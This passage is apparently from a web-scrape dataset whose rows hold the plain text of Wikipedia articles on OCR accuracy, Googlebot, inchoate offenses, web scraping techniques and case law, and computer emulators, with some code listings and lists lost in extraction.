can quickly process images like computer-driven OCR, but with higher accuracy for recognizing images than that obtained via computers. Practical systems include the Amazon Mechanical Turk and reCAPTCHA. The National Library of Finland has developed an online interface for users to correct OCRed texts in the standardized ALTO format. 32 Crowd sourcing has also been used not to perform character recognition directly but to invite software developers to develop image processing algorithms, for example, through the use of rank-order tournaments. 33 Commissioned by the U.S. Department of Energy (DOE), the Information Science Research Institute (ISRI) had the mission to foster the improvement of automated technologies for understanding machine printed documents, and it conducted the most authoritative of the Annual Test of OCR Accuracy from 1992 to 1996. 35 Recognition of typewritten, Latin script text is still not 100% accurate even where clear imaging is available. One study based on recognition of 19th- and early 20th-century newspaper pages concluded that character-by-character OCR accuracy for commercial OCR software varied from 81% to 99%; 36 total accuracy can be achieved by human review or Data Dictionary Authentication. Other areas including recognition of hand printing, cursive handwriting, and printed text in other scripts (especially those East Asian language characters which have many strokes for a single character) are still the subject of active research. The MNIST database is commonly used for testing systems' ability to recognize handwritten digits. Accuracy rates can be measured in several ways, and how they are measured can greatly affect the reported accuracy rate. For example, if word context (a lexicon of words) is not used to correct software finding non-existent words, a character error rate of 1% (99% accuracy) may result in an error rate of 5% or worse if the measurement is based on whether each whole word was recognized with no incorrect letters. 37 Using a large enough dataset is important in a neural-network-based handwriting recognition solutions. On the other hand, producing natural datasets is very complicated and time-consuming. 38 An example of the difficulties inherent in digitizing old text is the inability of OCR to differentiate between the "long s" and "f" characters. 39 34 Web-based OCR systems for recognizing hand-printed text on the fly have become well known as commercial products in recent years when? (see Tablet PC history). Accuracy rates of 80% to 90% on neat, clean hand-printed characters can be achieved by pen computing software, but that accuracy rate still translates to dozens of errors per page, making the technology useful only in very limited applications. citation needed Recognition of cursive text is an active area of research, with recognition rates even lower than that of hand-printed text. Higher rates of recognition of general cursive script will likely not be possible without the use of contextual or grammatical information. For example, recognizing entire words from a dictionary is easier than trying to parse individual characters from script. Reading the Amount line of a check (which is always a written-out number) is an example where using a smaller dictionary can increase recognition rates greatly. The shapes of individual cursive characters themselves simply do not contain enough information to accurately (greater than 98%) recognize all handwritten cursive script. citation needed Most programs allow users to set "confidence rates". This means that if the software does not achieve their desired level of accuracy, a user can be notified for manual review. An error introduced by OCR scanning is sometimes termed a scanno (by analogy with the term typo). 40 41 Characters to support OCR were added to the Unicode Standard in June 1993, with the release of version 1.1. Some of these characters are mapped from fonts specific to MICR, OCR-A or OCR-B. |
394 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Googlebot | Googlebot is the web crawler software used by Google that collects documents from the web to build a searchable index for the Google Search engine. This name is actually used to refer to two different types of web crawlers: a desktop crawler (to simulate desktop users) and a mobile crawler (to simulate a mobile user). 1 A website will probably be crawled by both Googlebot Desktop and Googlebot Mobile. However starting from September 2020, all sites were switched to mobile-first indexing, meaning Google is crawling the web using a smartphone Googlebot. 2 The subtype of Googlebot can be identified by looking at the user agent string in the request. However, both crawler types obey the same product token (useent token) in robots.txt, and so a developer cannot selectively target either Googlebot mobile or Googlebot desktop using robots.txt. Google provides various methods that enable website owners to manage the content displayed in Google's search results. If a webmaster chooses to restrict the information on their site available to a Googlebot, or another spider, they can do so with the appropriate directives in a robots.txt file, 3 or by adding the meta tag meta name "Googlebot" content "nofollow" to the web page. 4 Googlebot requests to Web servers are identifiable by a user-agent string containing "Googlebot" and a host address containing "googlebot.com". 5 Currently, Googlebot follows HREF links and SRC links. 3 There is increasing evidence Googlebot can execute JavaScript and parse content generated by Ajax calls as well. 6 There are many theories regarding how advanced Googlebot's ability is to process JavaScript, with opinions ranging from minimal ability derived from custom interpreters. 7 Currently, Googlebot uses a web rendering service (WRS) that is based on the Chromium rendering engine (version 74 as on 7 May 2019). 8 Googlebot discovers pages by harvesting every link on every page that it can find. Unless prohibited by a nofollow-tag, it then follows these links to other web pages. New web pages must be linked to from other known pages on the web in order to be crawled and indexed, or manually submitted by the webmaster. A problem that webmasters with low-bandwidth Web hosting plans citation needed have often noted with the Googlebot is that it takes up an enormous amount of bandwidth. citation needed This can cause websites to exceed their bandwidth limit and be taken down temporarily. This is especially troublesome for mirror sites which host many gigabytes of data. Google provides "Search Console" that allow website owners to throttle the crawl rate. 9 How often Googlebot will crawl a site depends on the crawl budget. Crawl budget is an estimation of how typically a website is updated. citation needed Technically, Googlebot's development team (Crawling and Indexing team) uses several defined terms internally to take over what "crawl budget" stands for. 10 Since May 2019, Googlebot uses the latest Chromium rendering engine, which supports ECMAScript 6 features. This will make the bot a bit more "evergreen" and ensure that it is not relying on an outdated rendering engine compared to browser capabilities. 8 Mediabot is the web crawler that Google uses for analyzing the content so Google AdSense can serve contextually relevant advertising to a web page. Mediabot identifies itself with the user agent string "Mediapartners-Google 2.1". Unlike other crawlers, Mediabot does not follow links to discover new crawlable URLs, instead only visiting URLs that have included the AdSense code. 11 Where that content resides behind a login, the crawler can be given a log in so that it is able to crawl protected content. 12 InspectionTool is the crawler used by Search testing tools such as the Rich Result Test and URL inspection in Google Search Console. Apart from the user agent and user agent token, it mimics Googlebot. 13 A guide to the crawlers was independently published. 14 It details four (4) distinctive crawler agents based on Web server directory index data - one (1) non-chrome and three (3) chrome crawlers. |
395 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Inchoate_offense | An inchoate offense, preliminary crime, inchoate crime or incomplete crime is a crime of preparing for or seeking to commit another crime. The most common example of an inchoate offense is "attempt". "Inchoate offense" has been defined as the following: "Conduct deemed criminal without actual harm being done, provided that the harm that would have occurred is one the law tries to prevent. 1 2 Every inchoate crime or offense must have the mens rea of intent or of recklessness, typically intent. Absent a specific law, an inchoate offense requires that the defendant have the specific intent to commit the underlying crime. For example, for a defendant to be guilty of the inchoate crime of solicitation of murder, he or she must have intended for a person to die. citation needed Attempt, 3 conspiracy, 4 and solicitation 5 all require mens rea. 6 On the other hand, committing an offense under the US Racketeer Influenced and Corrupt Organizations Act merely requires "knowing", 7 that is, recklessness. Facilitation also requires "believing", 8 yet another way of saying reckless. citation needed Intent may be distinguished from recklessness and criminal negligence as a higher mens rea. 9 Specific intent may be inferred from circumstances. 10 It may be proven by the doctrine of "dangerous proximity", while the Model Penal Code requires a "substantial step in a course of conduct". 11 The doctrine of merger has been abandoned in many jurisdictions in cases involving a conspiracy, allowing an accused to be convicted of both conspiracy and the principal offense. However, an accused cannot be convicted of either attempt or solicitation and the principal offense. 12 A number of defences are possible to the charge of an inchoate offense, depending on the jurisdiction and the nature of the offense. 13 Impossibility is no defence to the crime of attempt where the conditions creating the impossibility are unknown to the actor. 14 Originally at common law, impossibility was a complete defence; 15 as it was under French law at one point. 16 Indeed, the ruling in Collins's Case L. and C. 471 was that an offender cannot be guilty of an attempt to steal his own umbrella when he mistakenly believes that it belongs to another. Although the "moral guilt" for the attempt and the actual crime were the same, there was a distinction between the harm caused by a theft and the harmlessness of an impossible act. 17 This principle was directly overruled in England with the rulings R v Ring and R v. Brown 18 The example from R v Brown of an attempt to steal from an empty pocket is now a classic example of illustrating the point that impossibility is no defense to the crime of attempt when the conditions creating the impossibility are unknown to the actor. This principle has been codified in the Model Penal Code: A person is guilty of an attempt to commit a crime if, acting with the kind of culpability otherwise required for commission of the crime he: purposely engages in conduct which would constitute the crime if the attendant circumstances were as he believes them to be. MPC 5.01 (1)(a) (emphasis added). Consequently, the principle is universal in the United States either in Model Penal Code jurisdictions (40 states) or those remaining common law jurisdictions influenced by the reasoning in R v Brown. 19 Other cases that illustrate the case law for impossibility defences are People v. Lee Kong (CA, 1892), State v. Mitchell (MO, 1902), and United States v. Thomas (1962). A defendant may plead and prove, as an affirmative defense, that they: There is some scholarly treatment of burglaries in American law as inchoate crimes, but this is in dispute. According to scholar Frank Schmalleger, burglaries "are actually inchoate crimes in disguise. 20 Other scholars warn about the consequences of such a theory: Burglary, as a preliminary step to another crime, can be seen as an inchoate, or incomplete, offense. As it disrupts the security of persons in their homes and in regard to their personal property, however, it is complete as soon as the intrusion is made. This dual nature is at the heart of a debate about whether the crime of burglary ought to be abolished, leaving its elements to be covered by attempt or as aggravating circumstances to other crimes, or retained and the grading schemes reformed to reflect the seriousness of the individual offense. Certainly, possession of burglary tools, in those jurisdictions that criminalize that activity, creates an inchoate crime (going equipped in the UK). 22 It is clear that: In effect piling an inchoate crime onto an inchoate crime, the possession of burglary tools with the intent to use them in a burglary is a serious offense, a felony in some jurisdictions. Gloves that a defendant was trying to shake off as he ran from the site of a burglary were identified as burglar's tools in Green v. State (Fla. App. 1991). Examples of inchoate offenses include conspiracy, solicitation, facilitation, misprision of felony (and misprision generally), organized crime, Racketeer Influenced and Corrupt Organizations Act (RICO), and attempt, as well as some public health crimes; see the list below. 2 |
396 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-9 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
397 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Emulator | In computing, an emulator is hardware or software that enables one computer system (called the host) to behave like another computer system (called the guest). An emulator typically enables the host system to run software or use peripheral devices designed for the guest system. Emulation refers to the ability of a computer program in an electronic device to emulate (or imitate) another program or device. Many printers, for example, are designed to emulate HP LaserJet printers because so much software is written for HP printers. If a non-HP printer emulates an HP printer, any software written for a real HP printer will also run in the non-HP printer emulation and produce equivalent printing. Since at least the 1990s, many video game enthusiasts and hobbyists have used emulators to play classic arcade games from the 1980s using the games' original 1980s machine code and data, which is interpreted by a current-era system, and to emulate old video game consoles (see video game console emulator). A hardware emulator is an emulator which takes the form of a hardware device. Examples include the DOS-compatible card installed in some 1990s-era Macintosh computers, such as the Centris 610 or Performa 630, that allowed them to run personal computer (PC) software programs and field-programmable gate array-based hardware emulators. The Church-Turing thesis implies that theoretically, any operating environment can be emulated within any other environment, assuming memory limitations are ignored. However, in practice, it can be quite difficult, particularly when the exact behavior of the system to be emulated is not documented and has to be deduced through reverse engineering. It also says nothing about timing constraints; if the emulator does not perform as quickly as it did using the original hardware, the software inside the emulation may run much more slowly (possibly triggering timer interrupts that alter behavior). "Can a Commodore 64 emulate MS-DOS? Yes, it's possible for a Commodore 64 to emulate an IBM PC which uses MS-DOS , in the same sense that it's possible to bail out Lake Michigan with a teaspoon. Most emulators just emulate a hardware architecture—if operating system firmware or software is required for the desired software, it must be provided as well (and may itself be emulated). Both the OS and the software will then be interpreted by the emulator, rather than being run by native hardware. Apart from this interpreter for the emulated binary machine's language, some other hardware (such as input or output devices) must be provided in virtual form as well; for example, if writing to a specific memory location should influence what is displayed on the screen, then this would need to be emulated. While emulation could, if taken to the extreme, go down to the atomic level, basing its output on a simulation of the actual circuitry from a virtual power source, this would be a highly unusual solution. Emulators typically stop at a simulation of the documented hardware specifications and digital logic. Sufficient emulation of some hardware platforms requires extreme accuracy, down to the level of individual clock cycles, undocumented features, unpredictable analog elements, and implementation bugs. This is particularly the case with classic home computers such as the Commodore 64, whose software often depends on highly sophisticated low-level programming tricks invented by game programmers and the "demoscene". In contrast, some other platforms have had very little use of direct hardware addressing, such as an emulator for the PlayStation 4. 2 In these cases, a simple compatibility layer may suffice. This translates system calls for the foreign system into system calls for the host system e.g., the Linux compatibility layer used on BSD to run closed source Linux native software on FreeBSD and NetBSD. 3 For example, while the Nintendo 64 graphic processor was fully programmable, most games used one of a few pre-made programs, which were mostly self-contained and communicated with the game via FIFO; therefore, many emulators do not emulate the graphic processor at all, but simply interpret the commands received from the CPU as the original program would. Developers of software for embedded systems or video game consoles often design their software on especially accurate emulators called simulators before trying it on the real hardware. This is so that software can be produced and tested before the final hardware exists in large quantities, so that it can be tested without taking the time to copy the program to be debugged at a low level and without introducing the side effects of a debugger. In many cases, the simulator is actually produced by the company providing the hardware, which theoretically increases its accuracy. Math co-processor emulators allow programs compiled with math instructions to run on machines that do not have the co-processor installed, but the extra work done by the CPU may slow the system down. If a math coprocessor is not installed or present on the CPU, when the CPU executes any co-processor instruction it will make a determined interrupt (coprocessor not available), calling the math emulator routines. When the instruction is successfully emulated, the program continues executing. Logic simulation is the use of a computer program to simulate the operation of a digital circuit such as a processor. 4 This is done after a digital circuit has been designed in logic equations, but before the circuit is fabricated in hardware. Functional simulation is the use of a computer program to simulate the execution of a second computer program written in symbolic assembly language or compiler language, rather than in binary machine code. By using a functional simulator, programmers can execute and trace selected sections of source code to search for programming errors (bugs), without generating binary code. This is distinct from simulating execution of binary code, which is software emulation. The first functional simulator was written by Autonetics about 1960 citation needed for testing assembly language programs for later execution in military computer D 17B. This made it possible for flight programs to be written, executed, and tested before D 17B computer hardware had been built. Autonetics also programmed a functional simulator for testing flight programs for later execution in the military computer D 37C. Video game console emulators are programs that allow a personal computer or video game console to emulate another video game console. They are most often used to play older 1980s to 2000s-era video games on modern personal computers and more contemporary video game consoles. They are also used to translate games into other languages, to modify existing games, and in the development process of "home brew" DIY demos and in the creation of new games for older systems. The Internet has helped in the spread of console emulators, as most - if not all - would be unavailable for sale in retail outlets. Examples of console emulators that have been released in the last few decades are: RPCS3, Dolphin, Cemu, PCSX2, PPSSPP, ZSNES, Citra, ePSXe, Project64, Visual Boy Advance, Nestopia, and Yuzu. Due to their popularity, emulators have been impersonated by malware. Most of these emulators are for video game consoles like the Xbox 360, Xbox One, Nintendo 3DS, etc. Generally such emulators make currently impossible claims such as being able to run Xbox One and Xbox 360 games in a single program. 5 As computers and global computer networks continued to advance and emulator developers grew more skilled in their work, the length of time between the commercial release of a console and its successful emulation began to shrink. Fifth generation consoles such as Nintendo 64, PlayStation and sixth generation handhelds, such as the Game Boy Advance, saw significant progress toward emulation during their production. This led to an effort by console manufacturers to stop unofficial emulation, but consistent failures such as Sega v. Accolade 977 F.2d 1510 (9th Cir. 1992), Sony Computer Entertainment, Inc. v. Connectix Corporation 203 F.3d 596 (2000), and Sony Computer Entertainment America v. Bleem 214 F.3d 1022 (2000), 6 have had the opposite effect. According to all legal precedents, emulation is legal within the United States. However, unauthorized distribution of copyrighted code remains illegal, according to both country-specific copyright and international copyright law under the Berne Convention. 7 better source needed Under United States law, obtaining a dumped copy of the original machine's BIOS is legal under the ruling Lewis Galoob Toys, Inc. v. Nintendo of America, Inc., 964 F.2d 965 (9th Cir. 1992) as fair use as long as the user obtained a legally purchased copy of the machine. To mitigate this however, several emulators for platforms such as Game Boy Advance are capable of running without a BIOS file, using high-level emulation to simulate BIOS subroutines at a slight cost in emulation accuracy. citation needed Terminal emulators are software programs that provide modern computers and devices interactive access to applications running on mainframe computer operating systems or other host systems such as HP-UX or OpenVMS. Terminals such as the IBM 3270 or VT100 and many others are no longer produced as physical devices. Instead, software running on modern operating systems simulates a "dumb" terminal and is able to render the graphical and text elements of the host application, send keystrokes and process commands using the appropriate terminal protocol. Some terminal emulation applications include Attachmate Reflection, IBM Personal Communications, and Micro Focus Rumba. Other types of emulators include: Typically, an emulator is divided into modules that correspond roughly to the emulated computer's subsystems. Most often, an emulator will be composed of the following modules: Buses are often not emulated, either for reasons of performance or simplicity, and virtual peripherals communicate directly with the CPU or the memory subsystem. It is possible for the memory subsystem emulation to be reduced to simply an array of elements each sized like an emulated word; however, this model fails very quickly as soon as any location in the computer's logical memory does not match physical memory. This clearly is the case whenever the emulated hardware allows for advanced memory management (in which case, the MMU logic can be embedded in the memory emulator, made a module of its own, or sometimes integrated into the CPU simulator). Even if the emulated computer does not feature an MMU, though, there are usually other factors that break the equivalence between logical and physical memory: many (if not most) architectures offer memory-mapped I O; even those that do not often have a block of logical memory mapped to ROM, which means that the memory-array module must be discarded if the read-only nature of ROM is to be emulated. Features such as bank switching or segmentation may also complicate memory emulation. As a result, most emulators implement at least two procedures for writing to and reading from logical memory, and it is these procedures' duty to map every access to the correct location of the correct object. On a base-limit addressing system where memory from address 0 to address ROMSIZE 1 is read-only memory, while the rest is RAM, something along the line of the following procedures would be typical: The CPU simulator is often the most complicated part of an emulator. Many emulators are written using "pre-packaged" CPU simulators, in order to concentrate on good and efficient emulation of a specific machine. The simplest form of a CPU simulator is an interpreter, which is a computer program that follows the execution flow of the emulated program code and, for every machine code instruction encountered, executes operations on the host processor that are semantically equivalent to the original instructions. This is made possible by assigning a variable to each register and flag of the simulated CPU. The logic of the simulated CPU can then more or less be directly translated into software algorithms, creating a software re-implementation that basically mirrors the original hardware implementation. The following example illustrates how CPU simulation can be accomplished by an interpreter. In this case, interrupts are checked-for before every instruction executed, though this behavior is rare in real emulators for performance reasons (it is generally faster to use a subroutine to do the work of an interrupt). Interpreters are very popular as computer simulators, as they are much simpler to implement than more time-efficient alternative solutions, and their speed is more than adequate for emulating computers of more than roughly a decade ago on modern machines. However, the speed penalty inherent in interpretation can be a problem when emulating computers whose processor speed is on the same order of magnitude as the host machine dubious discuss . Until not many years ago, emulation in such situations was considered completely impractical by many dubious discuss . What allowed breaking through this restriction were the advances in dynamic recompilation techniques dubious discuss . Simple a priori translation of emulated program code into code runnable on the host architecture is usually impossible because of several reasons: Various forms of dynamic recompilation, including the popular Just In Time compiler (JIT) technique, try to circumvent these problems by waiting until the processor control flow jumps into a location containing untranslated code, and only then ("just in time") translates a block of the code into host code that can be executed. The translated code is kept in a code cache dubious discuss , and the original code is not lost or affected; this way, even data segments can be (meaninglessly) translated by the recompiler, resulting in no more than a waste of translation time. Speed may not be desirable as some older games were not designed with the speed of faster computers in mind. A game designed for a 30 MHz PC with a level timer of 300 game seconds might only give the player 30 seconds on a 300 MHz PC. Other programs, such as some DOS programs, may not even run on faster computers. Particularly when emulating computers which were "closed-box", in which changes to the core of the system were not typical, software may use techniques that depend on specific characteristics of the computer it ran on (e.g. its CPU's speed) and thus precise control of the speed of emulation is important for such applications to be properly emulated. Most emulators do not, as mentioned earlier, emulate the main system bus; each I O device is thus often treated as a special case, and no consistent interface for virtual peripherals is provided. This can result in a performance advantage, since each I O module can be tailored to the characteristics of the emulated device; designs based on a standard, unified I O API can, however, rival such simpler models, if well thought-out, and they have the additional advantage of "automatically" providing a plug-in service through which third-party virtual devices can be used within the emulator. A unified I O API may not necessarily mirror the structure of the real hardware bus: bus design is limited by several electric constraints and a need for hardware concurrency management that can mostly be ignored in a software implementation. Even in emulators that treat each device as a special case, there is usually a common basic infrastructure for: Emulation is one strategy in pursuit of digital preservation and combating obsolescence. Emulation focuses on recreating an original computer environment, which can be time-consuming and difficult to achieve, but valuable because of its ability to maintain a closer connection to the authenticity of the digital object, operating system, or even gaming platform. 8 Emulation addresses the original hardware and software environment of the digital object, and recreates it on a current machine. 9 The emulator allows the user to have access to any kind of application or operating system on a current platform, while the software runs as it did in its original environment. 10 Jeffery Rothenberg, an early proponent of emulation as a digital preservation strategy states, "the ideal approach would provide a single extensible, long-term solution that can be designed once and for all and applied uniformly, automatically, and in organized synchrony (for example, at every 